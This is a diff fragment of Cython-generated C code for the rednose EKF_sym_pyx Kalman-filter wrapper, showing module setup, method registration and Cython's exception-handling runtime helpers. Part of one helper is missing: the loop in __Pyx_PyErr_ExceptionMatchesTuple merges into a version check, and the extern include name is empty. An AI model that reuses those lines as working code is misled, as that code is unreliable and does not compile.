(__pyx_t_6) { + + /* "View.MemoryView":993 + * + * + * __pyx_collections_abc_Sequence.register(_memoryviewslice) # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence.register(array) + * except: + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_register); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 993, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_4 = __Pyx_PyObject_CallOneArg(__pyx_t_7, ((PyObject *)__pyx_memoryviewslice_type)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 993, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "View.MemoryView":994 + * + * __pyx_collections_abc_Sequence.register(_memoryviewslice) + * __pyx_collections_abc_Sequence.register(array) # <<<<<<<<<<<<<< + * except: + * pass # ignore failure, it's a minor issue + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_register); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 994, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_7 = __Pyx_PyObject_CallOneArg(__pyx_t_4, ((PyObject *)__pyx_array_type)); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 994, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":989 + * + * try: + * if __pyx_collections_abc_Sequence: # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":988 + * pass + * + * try: # <<<<<<<<<<<<<< + * if __pyx_collections_abc_Sequence: + * + */ + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L28_try_end; + __pyx_L23_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":995 + * __pyx_collections_abc_Sequence.register(_memoryviewslice) + * __pyx_collections_abc_Sequence.register(array) + * except: # <<<<<<<<<<<<<< + * pass # ignore failure, it's a minor issue + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L24_exception_handled; + } + __pyx_L24_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_2, __pyx_t_1); + __pyx_L28_try_end:; + } + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_t_7 = PyCFunction_NewEx(&__pyx_mdef_15View_dot_MemoryView_1__pyx_unpickle_Enum, NULL, __pyx_n_s_View_MemoryView); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_pyx_unpickle_Enum, __pyx_t_7) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":12 + * cimport numpy as np + * + * import numpy as np # <<<<<<<<<<<<<< + * + * cdef extern from "" namespace "std" nogil: + */ + __pyx_t_7 = __Pyx_ImportDottedModule(__pyx_n_s_numpy, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_np, __pyx_t_7) < 0) __PYX_ERR(0, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":85 + * def __cinit__(self, str gen_dir, str name, np.ndarray[np.float64_t, ndim=2] Q, + * np.ndarray[np.float64_t, ndim=1] x_initial, np.ndarray[np.float64_t, ndim=2] P_initial, int dim_main, + * int dim_main_err, int N=0, int dim_augment=0, int dim_augment_err=0, list maha_test_kinds=[], # <<<<<<<<<<<<<< + * list quaternion_idxs=[], list global_vars=[], double max_rewind_age=1.0, logger=None): + * # TODO logger + */ + __pyx_t_7 = PyList_New(0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 85, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_k__17 = ((PyObject*)__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":86 + * np.ndarray[np.float64_t, ndim=1] x_initial, np.ndarray[np.float64_t, ndim=2] P_initial, int dim_main, + * int dim_main_err, int N=0, int dim_augment=0, int dim_augment_err=0, list maha_test_kinds=[], + * list quaternion_idxs=[], list global_vars=[], double max_rewind_age=1.0, logger=None): # <<<<<<<<<<<<<< + * # TODO logger + * + */ + __pyx_t_7 = PyList_New(0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 86, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_k__18 = ((PyObject*)__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + __pyx_t_7 = PyList_New(0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 86, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_k__19 = ((PyObject*)__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":108 + * ) + * + * def init_state(self, np.ndarray[np.float64_t, ndim=1] state, np.ndarray[np.float64_t, ndim=2] covs, filter_time): # <<<<<<<<<<<<<< + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] state_b = np.ascontiguousarray(state, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] covs_b = np.ascontiguousarray(covs, dtype=np.double) + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_3init_state, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_init_state, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__20)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_init_state, __pyx_t_7) < 0) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":117 + * ) + * + * def state(self): # <<<<<<<<<<<<<< + * cdef np.ndarray res = vector_to_numpy(self.ekf.state()) + * return res + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_5state, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_state, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__21)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 117, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_state, __pyx_t_7) < 0) __PYX_ERR(0, 117, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":121 + * return res + * + * def covs(self): # <<<<<<<<<<<<<< + * return matrix_to_numpy(self.ekf.covs()) + * + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_7covs, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_covs, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__22)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 121, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_covs, __pyx_t_7) < 0) __PYX_ERR(0, 121, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":124 + * return matrix_to_numpy(self.ekf.covs()) + * + * def set_filter_time(self, double t): # <<<<<<<<<<<<<< + * self.ekf.set_filter_time(t) + * + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_9set_filter_time, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_set_filter_time, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__23)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 124, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_set_filter_time, __pyx_t_7) < 0) __PYX_ERR(0, 124, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":127 + * self.ekf.set_filter_time(t) + * + * def get_filter_time(self): # <<<<<<<<<<<<<< + * return self.ekf.get_filter_time() + * + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_11get_filter_time, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_get_filter_time, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__24)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 127, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_get_filter_time, __pyx_t_7) < 0) __PYX_ERR(0, 127, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":130 + * return self.ekf.get_filter_time() + * + * def set_global(self, str global_var, double val): # <<<<<<<<<<<<<< + * self.ekf.set_global(global_var.encode('utf8'), val) + * + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_13set_global, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_set_global, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__25)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 130, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_set_global, __pyx_t_7) < 0) __PYX_ERR(0, 130, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":133 + * self.ekf.set_global(global_var.encode('utf8'), val) + * + * def reset_rewind(self): # <<<<<<<<<<<<<< + * self.ekf.reset_rewind() + * + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_15reset_rewind, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_reset_rewind, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__26)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 133, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_reset_rewind, __pyx_t_7) < 0) __PYX_ERR(0, 133, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":136 + * self.ekf.reset_rewind() + * + * def predict(self, double t): # <<<<<<<<<<<<<< + * self.ekf.predict(t) + * + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_17predict, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_predict, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__27)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 136, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_predict, __pyx_t_7) < 0) __PYX_ERR(0, 136, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":139 + * self.ekf.predict(t) + * + * def predict_and_update_batch(self, double t, int kind, z, R, extra_args=[[]], bool augment=False): # <<<<<<<<<<<<<< + * cdef vector[MapVectorXd] z_map + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] zi_b + */ + __pyx_t_7 = PyList_New(0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 139, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_4 = PyList_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 139, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_7); + PyList_SET_ITEM(__pyx_t_4, 0, __pyx_t_7); + __pyx_t_7 = 0; + __pyx_k__28 = __pyx_t_4; + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + __pyx_t_4 = PyList_New(0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 139, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_7 = PyList_New(1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 139, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_7, 0, __pyx_t_4); + __pyx_t_4 = 0; + __pyx_t_4 = PyTuple_New(2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 139, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_7); + __Pyx_INCREF(Py_False); + __Pyx_GIVEREF(Py_False); + PyTuple_SET_ITEM(__pyx_t_4, 1, Py_False); + __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_19predict_and_update_batch, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_predict_and_update_b, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__29)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 139, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_7, __pyx_t_4); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_predict_and_update_batch, __pyx_t_7) < 0) __PYX_ERR(0, 139, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":177 + * ) + * + * def augment(self): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_21augment, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_augment, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__30)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 177, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_augment, __pyx_t_7) < 0) __PYX_ERR(0, 177, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":180 + * raise NotImplementedError() # TODO + * + * def get_augment_times(self): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_23get_augment_times, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_get_augment_times, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__31)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 180, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_get_augment_times, __pyx_t_7) < 0) __PYX_ERR(0, 180, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":183 + * raise NotImplementedError() # TODO + * + * def rts_smooth(self, estimates, norm_quats=False): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_25rts_smooth, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_rts_smooth, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__32)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 183, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_7, __pyx_tuple__55); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_rts_smooth, __pyx_t_7) < 0) __PYX_ERR(0, 183, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "rednose/helpers/ekf_sym_pyx.pyx":186 + * raise NotImplementedError() # TODO + * + * def maha_test(self, x, P, kind, z, R, extra_args=[], maha_thresh=0.95): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + __pyx_t_7 = PyList_New(0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_k__33 = __pyx_t_7; + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + __pyx_t_7 = PyList_New(0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_4 = PyTuple_New(2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_7); + __Pyx_INCREF(__pyx_float_0_95); + __Pyx_GIVEREF(__pyx_float_0_95); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_float_0_95); + __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_27maha_test, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx_maha_test, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__34)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_7, __pyx_t_4); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem((PyObject *)__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dict, __pyx_n_s_maha_test, __pyx_t_7) < 0) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_31__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx___reduce_cython, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__35)); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_7) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_33__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_EKF_sym_pyx___setstate_cython, NULL, __pyx_n_s_rednose_helpers_ekf_sym_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__36)); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_7) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":1 + * # cython: language_level=3 # <<<<<<<<<<<<<< + * # cython: profile=True + * # distutils: language = c++ + */ + __pyx_t_7 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_7) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_TraceReturn(Py_None, 0); + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_7); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init rednose.helpers.ekf_sym_pyx", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init rednose.helpers.ekf_sym_pyx"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + 